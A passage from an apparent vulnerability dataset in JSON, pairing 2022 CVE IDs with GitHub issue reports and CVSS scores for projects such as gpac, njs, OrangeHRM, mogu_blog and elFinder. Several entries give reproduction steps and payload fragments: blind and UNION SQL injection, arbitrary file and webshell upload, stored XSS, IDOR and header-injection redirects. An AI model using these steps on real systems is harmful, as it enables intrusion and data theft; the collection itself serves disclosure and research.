  81024. "description": "The Jellycms admin backend has an arbitrary file download vulnerability . Vulnerable file: PATHTAG FILETAG A logged-in user can change the APITAG parameter to download any file. Using the packdownload function in Database management, change the APITAG to something like PATHTAG so that the package looks like this: APITAG then the user can download the zip file and unpack it to obtain the contents of the config file.",
  81025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  81026. "severity": "HIGH",
  81027. "baseScore": 8.8,
  81028. "impactScore": 5.9,
  81029. "exploitabilityScore": 2.8
  81030. },
  81031. {
  81032. "CVE_ID": "CVE-2022-26967",
  81033. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2138",
  81034. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2138",
  81035. "Repo_new": "gpac/gpac",
  81036. "Issue_Created_At": "2022-03-10T09:47:43Z",
  81037. "description": "FILETAG Acknowledgement FILETAG",
  81038. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81039. "severity": "HIGH",
  81040. "baseScore": 7.8,
  81041. "impactScore": 5.9,
  81042. "exploitabilityScore": 1.8
  81043. },
  81044. {
  81045. "CVE_ID": "CVE-2022-26981",
  81046. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/1171",
  81047. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/1171",
  81048. "Repo_new": "liblouis/liblouis",
  81049. "Issue_Created_At": "2022-03-04T08:53:12Z",
  81050. "description": "FILETAG POC FILETAG",
  81051. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81052. "severity": "HIGH",
  81053. "baseScore": 7.8,
  81054. "impactScore": 5.9,
  81055. "exploitabilityScore": 1.8
  81056. },
  81057. {
  81058. "CVE_ID": "CVE-2022-27007",
  81059. "Issue_Url_old": "https://github.com/nginx/njs/issues/469",
  81060. "Issue_Url_new": "https://github.com/nginx/njs/issues/469",
  81061. "Repo_new": "nginx/njs",
  81062. "Issue_Created_At": "2022-02-15T08:42:02Z",
  81063. "description": "Patch bypass for njs_await_fulfilled, causing UAF again. This UAF was introduced in a patch for a similar bug NUMBERTAG which shows that njs_await_fulfilled is still flawed. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit p1umer( APITAG",
  81064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81065. "severity": "CRITICAL",
  81066. "baseScore": 9.8,
  81067. "impactScore": 5.9,
  81068. "exploitabilityScore": 3.9
  81069. },
  81070. {
  81071. "CVE_ID": "CVE-2022-27008",
  81072. "Issue_Url_old": "https://github.com/nginx/njs/issues/471",
  81073. "Issue_Url_new": "https://github.com/nginx/njs/issues/471",
  81074. "Repo_new": "nginx/njs",
  81075. "Issue_Created_At": "2022-02-15T09:26:33Z",
  81076. "description": "SEGV APITAG in njs_array_add. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  81077. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  81078. "severity": "HIGH",
  81079. "baseScore": 7.5,
  81080. "impactScore": 3.6,
  81081. "exploitabilityScore": 3.9
  81082. },
  81083. {
  81084. "CVE_ID": "CVE-2022-27041",
  81085. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/248",
  81086. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/248",
  81087. "Repo_new": "os4ed/opensis-classic",
  81088. "Issue_Created_At": "2022-03-07T15:07:24Z",
  81089. "description": "SQL Injection in PATHTAG Due to a lack of input handling, the parameter APITAG in PATHTAG can be abused to inject SQL queries and extract information from the database. POC: Type: boolean based blind Title: Boolean based blind Parameter replace (original value) Payload: PATHTAG (SELECT (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE (SELECT NUMBERTAG UNION SELECT NUMBERTAG END))&ajax=true Type: time based blind Title: APITAG NUMBERTAG AND time based blind (heavy query) Payload: PATHTAG AND APITAG Type: UNION query Title: Generic UNION query (NULL NUMBERTAG columns Payload: PATHTAG UNION ALL SELECT APITAG &ajax=true FILETAG Traceback: PATHTAG Solution: apply function APITAG to the value before assigning it from $_REQUEST (escaping the value), or better, use a prepared statement with bound parameters FILETAG",
  81090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  81091. "severity": "HIGH",
  81092. "baseScore": 7.5,
  81093. "impactScore": 3.6,
  81094. "exploitabilityScore": 3.9
  81095. },
  81096. {
  81097. "CVE_ID": "CVE-2022-27044",
  81098. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/156",
  81099. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/156",
  81100. "Repo_new": "saitoha/libsixel",
  81101. "Issue_Created_At": "2021-09-01T11:17:40Z",
  81102. "description": "heap buffer overflow in PATHTAG Hi, I found a heap buffer overflow in the current master NUMBERTAG a5be8b URLTAG I built APITAG with ASAN; this is the ASAN report. OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG ERRORTAG It happens in: URLTAG when NUMBERTAG y NUMBERTAG width NUMBERTAG then gdb info: FILETAG At this position, [r NUMBERTAG rc NUMBERTAG will be APITAG => APITAG so the write to data overflows the buffer and lands in a heap chunk that should not be written to (a heap out-of-bounds write). heap info: Before: CODETAG After: CODETAG",
  81103. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81104. "severity": "HIGH",
  81105. "baseScore": 8.8,
  81106. "impactScore": 5.9,
  81107. "exploitabilityScore": 2.8
  81108. },
  81109. {
  81110. "CVE_ID": "CVE-2022-27046",
  81111. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/157",
  81112. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/157",
  81113. "Repo_new": "saitoha/libsixel",
  81114. "Issue_Created_At": "2021-09-14T12:18:43Z",
  81115. "description": "heap use after free in PATHTAG Hi, I found a heap use-after-free in the current master NUMBERTAG a5be8b URLTAG I built img2sixel with ASAN; this is the ASAN report. OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG ERRORTAG",
  81116. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81117. "severity": "HIGH",
  81118. "baseScore": 8.8,
  81119. "impactScore": 5.9,
  81120. "exploitabilityScore": 2.8
  81121. },
  81122. {
  81123. "CVE_ID": "CVE-2022-27047",
  81124. "Issue_Url_old": "https://github.com/moxi624/mogu_blog_v2/issues/62",
  81125. "Issue_Url_new": "https://github.com/moxi624/mogu_blog_v2/issues/62",
  81126. "Repo_new": "moxi624/mogu_blog_v2",
  81127. "Issue_Created_At": "2022-03-08T07:21:56Z",
  81128. "description": "mogu_blog NUMBERTAG backend Management System has an vulnerability of uploading arbitrary files. APITAG box pentesting Using mogu NUMBERTAG mogu NUMBERTAG to log in the mogu_blog NUMBERTAG backend Management System. FILETAG Find the Blog Management Blog Management Local file Upload feature . FILETAG Click this blue button to select a local image for uploading, and then click the green button to put the image to server side FILETAG At this point, use the burp suite to capture the request packet. FILETAG and then forward it to the Repeater module. Try to send a request to upload a normal image and you can see that the image was uploaded successfully. And the response packet returns the address information of the image. FILETAG Splice the address in the response packet with the url to try to access the image we just uploaded . The whole url : FILETAG You can see the successful access to the uploaded image. FILETAG Back in the burp suite, try changing the contents of the file in the request package to xss payload\uff0cas well as trying to change the file name to an html suffix. FILETAG You can see the successful upload and the file path in the response package. Splice the file path to the url and open a new browser (without admin PATHTAG ) to try to access it. The whole url : FILETAG FILETAG You can see that the xss payload was successfully executed and that there is an arbitrary file to upload. Try again to modify the request package and found that arbitrary file uploads were possible while the feature was intended to allow only image format files to be uploaded. 
jsp: FILETAG php: FILETAG cpp: FILETAG APITAG box pentest Based on the url of the image upload request ( PATHTAG ), we can tell that the class that handles the image upload function is located in the /mogu picture subproject FILETAG FILETAG According to the request url ( PATHTAG ) continue to locate the APITAG class PATHTAG FILETAG With APITAG you can see that all requests for the /file path will be processed by this class And requests for the /file/pictures path are handled by the APITAG method of this class FILETAG This method first obtains the system configuration file, and this step does not perform any checks on the suffix name, format, or file content of the uploaded file This method then calls the APITAG method of the APITAG class instance object FILETAG Follow up in the APITAG method of the APITAG class to see its source code FILETAG The first part of the code is to get some files and system base information, none of which is file checked Continuing to follow up to the code for file uploads, You can see that there is no strict verification of the uploaded file extension, file content, or file format FILETAG The next code execution reaches the try /catch {} block, which involves the APITAG method of the APITAG class FILETAG Going deeper into this method leads to the APITAG method. FILETAG You can see that the file suffix, file format and file content are still not strictly verified. Back in the APITAG method of the APITAG class, After checking the code after , not only the code for uploading the APITAG server did not have strict file verification, but also the code for uploading Minio server and the code for uploading to the local server was not strictly verified. Finally, in the APITAG method of the APITAG class, the following code will be executed. FILETAG Set the information of the uploaded file to some settings. Then save and upload feedback to the client response file. 
The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files. This allows attackers to use the file upload interface to upload arbitrary files and even insert xss payloads.",
  81129. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81130. "severity": "CRITICAL",
  81131. "baseScore": 9.8,
  81132. "impactScore": 5.9,
  81133. "exploitabilityScore": 3.9
  81134. },
  81135. {
  81136. "CVE_ID": "CVE-2022-27055",
  81137. "Issue_Url_old": "https://github.com/ecjia/ecjia-daojia/issues/20",
  81138. "Issue_Url_new": "https://github.com/ecjia/ecjia-daojia/issues/20",
  81139. "Repo_new": "ecjia/ecjia-daojia",
  81140. "Issue_Created_At": "2022-03-08T11:32:51Z",
  81141. "description": "information leakage. FILETAG file line NUMBERTAG creates the .env file Content APITAG = APITAG . DIRECTORY_SEPARATOR . '.env'; Its content is to create a .env file in the root directory and write the database account, password, and database name",
  81142. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  81143. "severity": "HIGH",
  81144. "baseScore": 7.5,
  81145. "impactScore": 3.6,
  81146. "exploitabilityScore": 3.9
  81147. },
  81148. {
  81149. "CVE_ID": "CVE-2022-27103",
  81150. "Issue_Url_old": "https://github.com/element-plus/element-plus/issues/6514",
  81151. "Issue_Url_new": "https://github.com/element-plus/element-plus/issues/6514",
  81152. "Repo_new": "element-plus/element-plus",
  81153. "Issue_Created_At": "2022-03-10T07:47:54Z",
  81154. "description": "Bug Report] APITAG [table column] table column \u4e2d\u5bf9\u4e8e \u5c5e\u6027 show overflow tooltip \u5904\u7406\u5b58\u5728\u95ee\u9898 \u53ef\u4ee5\u5bfc\u81f4 XSS. APITAG Bug Type: Component Environment Vue Version: APITAG Element Plus Version: APITAG Browser / OS: APITAG Build Tool: Vue CLI Reproduction Related Component APITAG Reproduction Link APITAG Repo URLTAG Steps to reproduce \u6309\u7167 \u590d\u73b0\u9879\u76ee\u7684 readme \u8fdb\u884c\u6784\u5efa \u8bbf\u95ee serve \u5728 \u542b\u6709 payload \u7684 address \u7684\u5217\u5904\u4e2d\u5212\u8fc7\u5149\u6807 \u5c31\u53ef\u4ee5\u89e6\u53d1 js \u8fd0\u884c\u5bfc\u81f4 xss What is Expected? \u6e32\u67d3img\u6216\u8005\u4e0d\u6e32\u67d3\u90fd\u53ef\u4ee5 \u4f46\u4e0d\u53ef\u4ee5\u6267\u884c APITAG What is actually happening? \u6e32\u67d3\u6587\u672c\u5185\u5bb9\u4e3a html \u5e76\u4e14\u6267\u884c APITAG \u811a\u672c Additional comments elementui plus \u662f\u4e00\u4e2a\u5927\u4ed3\u5e93\u5bfc\u81f4\u6709\u8bb8\u8bb8\u591a\u591a\u7684\u524d\u7aef\u9879\u76ee\u4f9d\u8d56\u5176\u800c\u6784\u5efa show overflow tooltip \u5df2\u7ecf\u53ef\u4ee5\u901a\u8fc7 github \u4ee3\u7801\u641c\u7d22 \u627e\u5230\u76f8\u5173\u9879\u76ee \u5e76\u4e14\u5176\u4e2d\u5305\u542b\u4e00\u4e9b\u90e8\u5206\u540e\u53f0\u7ba1\u7406\u9879\u76ee \u5efa\u8bae\u901a\u77e5\u5f00\u53d1\u8005 \u66f4\u65b0\u9879\u76ee\u4e0e\u4fee\u590d\u8be5\u95ee\u9898 \u6b64\u5916\u6587\u6863\u4e2d\u5efa\u8bae\u6dfb\u52a0\u76f8\u5173 \u5b89\u5168\u8b66\u544a \u5176\u4ed6\u76f8\u5173\u4fe1\u606f: URLTAG Reporter: MENTIONTAG MENTIONTAG APITAG",
  81155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81156. "severity": "MEDIUM",
  81157. "baseScore": 6.1,
  81158. "impactScore": 2.7,
  81159. "exploitabilityScore": 2.8
  81160. },
  81161. {
  81162. "CVE_ID": "CVE-2022-27103",
  81163. "Issue_Url_old": "https://github.com/asjdf/element-table-xss-test/issues/1",
  81164. "Issue_Url_new": "https://github.com/asjdf/element-table-xss-test/issues/1",
  81165. "Repo_new": "asjdf/element-table-xss-test",
  81166. "Issue_Created_At": "2022-03-10T06:13:23Z",
  81167. "description": "vuln location seems like there.. URLTAG They render the html as the code. All Frontend Program used show overflow tooltips = true attr and concat the backend feedback into this column seems to have this problem, and moreover triggered XSS",
  81168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81169. "severity": "MEDIUM",
  81170. "baseScore": 6.1,
  81171. "impactScore": 2.7,
  81172. "exploitabilityScore": 2.8
  81173. },
  81174. {
  81175. "CVE_ID": "CVE-2022-27107",
  81176. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1176",
  81177. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1176",
  81178. "Repo_new": "orangehrm/orangehrm",
  81179. "Issue_Created_At": "2022-03-10T13:56:32Z",
  81180. "description": "Stored XSS in the APITAG Video\" section under APITAG via the GET/POST APITAG APITAG parameter. Environment details APITAG version NUMBERTAG APITAG source: Release build from APITAG URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug In order to share a video, a user provides the URL in the APITAG Video\" feature under APITAG A GET request is then sent to the PATHTAG endpoint with the url as a parameter. The application's backend then validates the url against a whitelist of domains and sends an appropriate response. If the domain in the url is in the whitelist, the application creates an iframe element and embeds the video link in it. The user then submits the post by clicking the APITAG Video\" button. The APITAG page, including the newly posted video, is sent back in the response body. The initial whitelist based validation can be bypassed by sending a request, like the above, containing any arbitrary URL in the APITAG parameter. The value of this parameter is injected into the iframe's src attribute. Due to this, it is possible to inject the javascript: pseudo protocol and gain arbitrary APITAG execution in the browser of anyone who visits the APITAG page. For example, the string APITAG can be passed as the value of the APITAG parameter. When a user visits the APITAG page, the payload will be interpreted as APITAG and get executed so an alert will pop up with the domain hosting the application at that instance. 
To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to APITAG > APITAG Video NUMBERTAG Paste any youtube.com video link NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on APITAG video NUMBERTAG Replace the value in the POST parameter APITAG to APITAG and click on APITAG in Burp NUMBERTAG Turn off Intercept in Burp NUMBERTAG Navigate to APITAG NUMBERTAG Notice that an alert will pop up with the Domain value of the application's server printed which means the payload we injected into the APITAG parameter is interpreted as valid Javascript and is executed. Expected behavior The value of the APITAG parameter is validated by the application's backend and an error is thrown. What do you see instead: The post gets uploaded successfully. Screenshots FILETAG FILETAG",
  81181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81182. "severity": "MEDIUM",
  81183. "baseScore": 5.4,
  81184. "impactScore": 2.7,
  81185. "exploitabilityScore": 2.3
  81186. },
  81187. {
  81188. "CVE_ID": "CVE-2022-27108",
  81189. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1173",
  81190. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1173",
  81191. "Repo_new": "orangehrm/orangehrm",
  81192. "Issue_Created_At": "2022-03-10T13:56:23Z",
  81193. "description": "Insecure Direct Object Reference (IDOR) via the end point APITAG allows any user can create a timesheet in another user's account. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug A user can create a timesheet for a specific week by using the APITAG Timesheet\" functionality, after which the timesheet is accessible for editing and submission under the dropdown menu. It was observed that when the APITAG parameter was set to any valid user's employee ID, a timesheet was created in that employee's account. The application verifies if a user has a valid session, but does not verify if a user is authorised to create a timesheet for a different APITAG . It is also possible to find out whether a timesheet has already been created for a specific week, by analysing the HTTP response. To Reproduce NUMBERTAG Login to the APITAG application as user A with APITAG as APITAG NUMBERTAG Navigate to APITAG > \"My Timesheet NUMBERTAG Click on APITAG Timesheet NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on the textbox and select any date, say NUMBERTAG Click on \"Ok NUMBERTAG Go to the Burp Intercept tab and you will notice a GET request being made to the APITAG endpoint NUMBERTAG Modify the value of APITAG parameter to a user B's APITAG , APITAG NUMBERTAG Click on Forward and turn off Intercept NUMBERTAG Login to user B's account NUMBERTAG Navigate to APITAG > \"My Timesheet NUMBERTAG Click on the dropdown menu beside APITAG for Week NUMBERTAG Notice that a new entry has been created with the date NUMBERTAG Expected behavior APITAG required\" error. What do you see instead: The response body contains the date of the entry NUMBERTAG Screenshots FILETAG FILETAG",
  81194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  81195. "severity": "MEDIUM",
  81196. "baseScore": 4.3,
  81197. "impactScore": 1.4,
  81198. "exploitabilityScore": 2.8
  81199. },
  81200. {
  81201. "CVE_ID": "CVE-2022-27109",
  81202. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1174",
  81203. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1174",
  81204. "Repo_new": "orangehrm/orangehrm",
  81205. "Issue_Created_At": "2022-03-10T13:56:26Z",
  81206. "description": "Referer header injection redirect vulnerability. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug This is similar to the Host header injection redirect vulnerability, except the issue lies in the Referer header and the vulnerable endpoints are different . To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to \"My Info NUMBERTAG Under APITAG Attachment\", click on APITAG NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Select any PNG file and Click on APITAG NUMBERTAG Change the value of the Referer header to APITAG NUMBERTAG Click on Forward in Burp and turn off Intercept NUMBERTAG You will notice that the page gets redirected to APITAG Expected behavior A ERRORTAG error. What do you see instead: A NUMBERTAG redirect to the malicious domain. Screenshots FILETAG",
  81207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81208. "severity": "MEDIUM",
  81209. "baseScore": 5.4,
  81210. "impactScore": 2.7,
  81211. "exploitabilityScore": 2.3
  81212. },
  81213. {
  81214. "CVE_ID": "CVE-2022-27110",
  81215. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1175",
  81216. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1175",
  81217. "Repo_new": "orangehrm/orangehrm",
  81218. "Issue_Created_At": "2022-03-10T13:56:28Z",
  81219. "description": "Host header injection redirect vulnerability. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug When an authenticated user submits the APITAG Details\" form, a NUMBERTAG redirect to the APITAG Details\" URL is sent in the response. Following is a request and its response\u2014 CODETAG Response: CODETAG It was noticed that upon manipulating the Host header, in the POST request, to an arbitrary domain, it was possible to inject the Host header into the URL redirection in the NUMBERTAG response. A user would then be redirected to the arbitrary domain. For example, the domain APITAG can be passed as the value of the Host header in the POST request. The resulting NUMBERTAG response redirects the user to URLTAG Due to the nature of this vulnerability, it can be used in phishing attacks. Following are the endpoints in the APITAG application that are vulnerable to the Host Header Injection Redirect vulnerability NUMBERTAG PATHTAG NUMBERTAG PATHTAG To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to \"My Info NUMBERTAG Under APITAG Details\", click on APITAG NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on APITAG NUMBERTAG Change the value of the Host header to APITAG NUMBERTAG Click on Forward in Burp and turn off Intercept NUMBERTAG You will notice that the page gets redirected to APITAG Expected behavior A ERRORTAG error. What do you see instead: A NUMBERTAG redirect to the malicious domain. Screenshots FILETAG FILETAG",
  81220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81221. "severity": "MEDIUM",
  81222. "baseScore": 5.4,
  81223. "impactScore": 2.7,
  81224. "exploitabilityScore": 2.3
  81225. },
  81226. {
  81227. "CVE_ID": "CVE-2022-27111",
  81228. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/32",
  81229. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/32",
  81230. "Repo_new": "jflyfox/jfinal_cms",
  81231. "Issue_Created_At": "2022-03-10T14:43:57Z",
  81232. "description": "A stored XSS vulnerability in the feedback function module of jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the feedback function module of jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the feedback of jfinal_cms. An attacker can insert malicious XSS code into the feedback content. When the administrator views the feedback list in the background, the malicious XSS code is successfully triggered. First register for a user test, then enter the feedback page, insert malicious XSS attack code in the feedback content: Payload : APITAG APITAG Then, when the administrator views the feedback in the background, the malicious XSS code is successfully triggered, and there is no need to click on the corresponding feedback, it can be triggered only on the list page. FILETAG Administrators view the feedback list: FILETAG Successfully executed malicious XSS code: FILETAG Safety advice: Strictly filter the user's input Strict control of page rendering content",
  81233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81234. "severity": "MEDIUM",
  81235. "baseScore": 5.4,
  81236. "impactScore": 2.7,
  81237. "exploitabilityScore": 2.3
  81238. },
  81239. {
  81240. "CVE_ID": "CVE-2022-27114",
  81241. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/471",
  81242. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/471",
  81243. "Repo_new": "michaelrsweet/htmldoc",
  81244. "Issue_Created_At": "2022-03-10T05:57:25Z",
  81245. "description": "Two Integer Overflow bugs in APITAG Hi, there are two integer overflow bugs in the latest version of htmldoc. They are similar to CVETAG CVETAG . os: ubuntu NUMBERTAG ersion NUMBERTAG the latest) First First, in image_load_jpeg function, APITAG When it calls malloc\uff0c'img >width' and 'img >height' are large enough to cause an integer overflow So, the malloc function may return a heap block smaller than the expected size, and it will cause a buffer APITAG boundary error in the jpeg_read_scanlines function. URLTAG URLTAG Asan report: ERRORTAG And this is the poc file\uff1a FILETAG Second There is another integer overflow bug in image_load_png function, APITAG similar to the first one. URLTAG It calls calloc to get a heap block. However, the width and height of the png file are both four bytes long, so 'img >width' and 'img >height' are large enough to cause an integer overflow. The calloc function may return a heap block smaller than the expected size, and finally cause a heap overflow in the png_read_rows function when memcpy. This is the Asan report: ERRORTAG And this is the poc file: FILETAG",
  81246. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81247. "severity": "MEDIUM",
  81248. "baseScore": 5.5,
  81249. "impactScore": 3.6,
  81250. "exploitabilityScore": 1.8
  81251. },
  81252. {
  81253. "CVE_ID": "CVE-2022-27115",
  81254. "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3458",
  81255. "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3458",
  81256. "Repo_new": "studio-42/elfinder",
  81257. "Issue_Created_At": "2022-02-20T17:25:31Z",
  81258. "description": "Filename bypass leading to RCE. Describe the bug Filename bypass leading to Remote Code Execution To Reproduce Steps to reproduce the behavior NUMBERTAG Upload a file with APITAG named FILETAG , Note: the letter 'a' at the beginning of the content cannot be omitted NUMBERTAG Add two dots after the file name like this APITAG NUMBERTAG The shell file is successfully uploaded by bypassing detection and can be accessed via APITAG NUMBERTAG This vulnerability can only be exploited on windows systems. Screenshots FILETAG Desktop (please complete the following information): OS: Windows",
  81259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81260. "severity": "CRITICAL",
  81261. "baseScore": 9.8,
  81262. "impactScore": 5.9,
  81263. "exploitabilityScore": 3.9
  81264. },
  81265. {
  81266. "CVE_ID": "CVE-2022-27145",
  81267. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2108",
  81268. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2108",
  81269. "Repo_new": "gpac/gpac",
  81270. "Issue_Created_At": "2022-02-08T04:22:07Z",
  81271. "description": "There is a stack overflow detected by APITAG Description There is a stack overflow detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
  81272. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81273. "severity": "MEDIUM",
  81274. "baseScore": 5.5,
  81275. "impactScore": 3.6,
  81276. "exploitabilityScore": 1.8
  81277. },
  81278. {
  81279. "CVE_ID": "CVE-2022-27146",
  81280. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2120",
  81281. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2120",
  81282. "Repo_new": "gpac/gpac",
  81283. "Issue_Created_At": "2022-02-16T11:57:40Z",
  81284. "description": "There is a heap buffer overflow detected by APITAG Description There is a heap buffer overflow detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
  81285. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81286. "severity": "MEDIUM",
  81287. "baseScore": 5.5,
  81288. "impactScore": 3.6,
  81289. "exploitabilityScore": 1.8
  81290. },
  81291. {
  81292. "CVE_ID": "CVE-2022-27147",
  81293. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2109",
  81294. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2109",
  81295. "Repo_new": "gpac/gpac",
  81296. "Issue_Created_At": "2022-02-08T04:23:02Z",
  81297. "description": "There is a use after free detected by APITAG Description There is a use after free detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
  81298. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81299. "severity": "MEDIUM",
  81300. "baseScore": 5.5,
  81301. "impactScore": 3.6,
  81302. "exploitabilityScore": 1.8
  81303. },
  81304. {
  81305. "CVE_ID": "CVE-2022-27148",
  81306. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2067",
  81307. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2067",
  81308. "Repo_new": "gpac/gpac",
  81309. "Issue_Created_At": "2022-01-26T05:27:46Z",
  81310. "description": "Signed integer overflow. Description There are some signed integer overflow caused runtime error and are detected by APITAG System info CODETAG Build command APITAG Crash command APITAG isma timescale NUMBERTAG out /dev/null poc_file Pocs POCs URLTAG Crash output poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG",
  81311. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81312. "severity": "MEDIUM",
  81313. "baseScore": 5.5,
  81314. "impactScore": 3.6,
  81315. "exploitabilityScore": 1.8
  81316. },
  81317. {
  81318. "CVE_ID": "CVE-2022-27156",
  81319. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/593",
  81320. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/593",
  81321. "Repo_new": "daylightstudio/fuel-cms",
  81322. "Issue_Created_At": "2022-03-13T16:39:35Z",
  81323. "description": "HTML Injection Issue. A HTML Injection issue is affecting the application. STEP NUMBERTAG FILETAG STEP NUMBERTAG FILETAG",
  81324. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81325. "severity": "MEDIUM",
  81326. "baseScore": 5.4,
  81327. "impactScore": 2.7,
  81328. "exploitabilityScore": 2.3
  81329. },
  81330. {
  81331. "CVE_ID": "CVE-2022-27161",
  81332. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/43",
  81333. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/43",
  81334. "Repo_new": "cskaza/cszcms",
  81335. "Issue_Created_At": "2022-03-14T03:38:29Z",
